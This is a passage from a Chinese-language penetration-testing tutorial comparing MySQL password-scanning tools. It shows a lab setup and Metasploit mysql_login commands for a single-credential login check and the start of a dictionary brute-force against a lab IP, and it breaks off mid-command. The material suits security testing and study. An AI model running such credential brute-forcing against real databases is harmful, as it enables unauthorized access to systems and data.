對於MySQL資料庫滲透來說，獲取其口令至關重要，一般來講資料庫不會提供對外連線，安全嚴格的將會限制固有IP和本機登入資料庫，但滲透就是發現各種例外！抱著研究的目地，將目前市面上主流的7款MySQL口令掃描工具進行實際測試，並給出了實際利用場景的具體命令，在進行滲透測試時，具有較高的參考價值。

1.測試環境：Windows 2003 Server +PHP+MySQL5.0.90-community-nt
2.賬號設定：允許遠端訪問也即設定host為%，同時密碼設定為11111111。
3.測試機：kali linux2017和windows 2003
6.1 Metasploit掃描MySQL口令

有關利用Metasploit掃描詳細利用可以參考本人網上釋出的《利用Msf輔助模組檢測和滲透Mysql》，這裡主要是介紹如何掃描MySQL口令。
1.啟動Metasploit命令
在kali終端下輸入：msfconsole
2. 密碼掃描auxiliary/scanner/mysql/mysql_login模組
(1)單一模式掃描登入驗證
use auxiliary/scanner/mysql/mysql_login
set rhosts 192.168.157.130
set username root
set password 11111111
run
（2）使用字典對某個IP地址進行暴力破解
use auxiliary/scanner/mysql/mysql_login
set RHOSTS 192.168.157.130
set pass_file “/root/top10000pwd.txt”
set username root